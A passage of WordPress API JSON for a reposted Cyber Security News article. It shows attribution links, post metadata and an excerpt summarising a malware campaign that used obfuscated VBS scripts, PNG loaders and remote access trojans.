target=\"_blank\" rel=\"noreferrer noopener nofollow\">Google<\/a>.<\/strong><\/p>\n<p>The post <a href=\"https:\/\/cybersecuritynews.com\/open-directory-malware-campaign\/\">Open Directory Malware Campaign Uses Obfuscated VBS, PNG Loaders and RAT Payloads<\/a> appeared first on <a href=\"https:\/\/cybersecuritynews.com\/\">Cyber Security News<\/a>.<\/p>\n<\/div>\n<p> \t<BR><br \/>\n <BR><\/BR><br \/>\n    Tushar Subhra Dutta<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n<a href=\"https:\/\/cybersecuritynews.com\/open-directory-malware-campaign\/\">Go to cyber-security-news<\/a><br \/>\n \t<BR><br \/>\n <BR><\/BR><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Open Directory Malware Campaign Uses Obfuscated VBS, PNG Loaders and RAT Payloads A sophisticated multi-stage malware campaign has surfaced, deploying obfuscated Visual Basic Script (VBS) files, PNG-embedded loaders, and remote access trojans (RATs) to target systems without leaving a trace on disk. What began as a routine endpoint detection in early 2026 quickly revealed itself [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[129,63,649],"tags":[130],"class_list":["post-11622","post","type-post","status-publish","format-standard","hentry","category-cyber-security","category-cyber-security-news","category-threats","tag-cyber-security-news"],"_links":{"self":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/11622"}],"collection":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/comments?post=11622"}],"version-history":[{"count":0,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/11622\/revisions"}],"wp:attachment":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/media?parent=11622"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/categories?post=11622"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/tags?post=11622"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}